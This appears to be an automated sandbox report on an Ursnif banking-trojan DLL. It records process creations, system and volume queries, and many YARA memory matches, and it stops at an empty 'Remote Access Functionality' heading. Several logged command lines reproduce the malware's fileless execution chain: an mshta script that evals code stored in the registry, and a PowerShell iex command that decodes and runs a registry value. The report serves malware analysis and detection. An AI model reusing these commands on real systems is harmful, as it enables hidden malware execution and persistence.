Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Cbv5='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cbv5).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\2u2mgtylJy.dll',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jdlmh2q4.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\w34iw342.cmdline' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESD66D.tmp' 'c:\Users\user\AppData\Local\Temp\CSCCE0193F21C5D49109645DA91D5FFF210.TMP' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESE022.tmp' 'c:\Users\user\AppData\Local\Temp\CSC919BED62534A4CC3BF2669B466E033B8.TMP'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yg5i0oy3.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\4z2qptpk.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES889.tmp' 'c:\Users\user\AppData\Local\Temp\CSCCED00F42533349BEA98D8A77AE340CD.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1839.tmp' 'c:\Users\user\AppData\Local\Temp\CSC5471F709FE714810AB0D5625CD34D24.TMP'
Source: loaddll32.exe, 00000000.00000002.1031755117.00000000017B0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1037190213.00000000038A0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.534817703.00000000011E0000.00000002.00020000.sdmp, control.exe, 0000001F.00000000.520261462.0000019E71160000.00000002.00020000.sdmp, control.exe, 00000025.00000000.800557754.000001D219370000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 0000001A.00000000.516396060.0000000000B68000.00000004.00000020.sdmp Binary or memory string: Progman\Pr
Source: loaddll32.exe, 00000000.00000002.1031755117.00000000017B0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1037190213.00000000038A0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.534817703.00000000011E0000.00000002.00020000.sdmp, control.exe, 0000001F.00000000.520261462.0000019E71160000.00000002.00020000.sdmp, control.exe, 00000025.00000000.800557754.000001D219370000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.1031755117.00000000017B0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1037190213.00000000038A0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.534817703.00000000011E0000.00000002.00020000.sdmp, control.exe, 0000001F.00000000.520261462.0000019E71160000.00000002.00020000.sdmp, control.exe, 00000025.00000000.800557754.000001D219370000.00000002.00020000.sdmp Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.1031755117.00000000017B0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1037190213.00000000038A0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.534817703.00000000011E0000.00000002.00020000.sdmp, control.exe, 0000001F.00000000.520261462.0000019E71160000.00000002.00020000.sdmp, control.exe, 00000025.00000000.800557754.000001D219370000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 0000001A.00000000.506175893.0000000008778000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndh

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Queries the installation date of Windows
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F32E33 cpuid 0_2_00F32E33
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F36632 HeapCreate,GetTickCount,GetSystemTimeAsFileTime,SwitchToThread,_aullrem,Sleep,IsWow64Process, 0_2_00F36632
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F36F10 GetVersion,lstrcat,lstrcat,lstrcat,GetLastError, 0_2_00F36F10
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F32E33 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 0_2_00F32E33

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.440873523.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.521119646.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502401968.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502219800.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.471379540.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462394382.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462596690.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440860771.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462470408.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1014883407.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.521272154.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502330882.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440884295.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462528723.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502570590.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.448279110.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.524731514.00000000064C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502479250.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.466413805.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440805888.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.443913452.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.521180114.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.521239146.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502279805.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440780908.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502609356.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440846323.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440750956.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.473802684.000000000585C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462613151.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440828072.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502443301.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.450243555.000000000385C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462579053.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502514325.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462505929.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462554968.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 7044, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 7076, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 2988, type: MEMORYSTR
Source: Yara match File source: 3.3.rundll32.exe.595a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.595a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.5a08d40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.59d94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.39d94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.3a08d40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.3a08d40.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.395a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.395a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000003.471332372.00000000059D9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.471296215.000000000595A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.516409229.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.448235433.00000000039D9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.518371045.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.638276522.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.448202934.000000000395A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.975772859.0000000000CC1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1014253469.00000000009F1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.760211370.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1031952216.00000000036DF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.564342319.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.514046155.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 6.3.rundll32.exe.2f18cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.rundll32.exe.31b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.f30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.rundll32.exe.4ad8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.rundll32.exe.2e38cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.30994a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.rundll32.exe.4da94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.32e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.11c8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.30994a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.32d8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.rundll32.exe.4da94a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000003.380707508.00000000032D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.405323039.0000000002F10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.408114811.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.441574566.0000000004DA9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.392684354.0000000004AD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.379823360.0000000002E30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1031847284.0000000003099000.00000004.00000040.sdmp, type: MEMORY

Remote Access Functionality: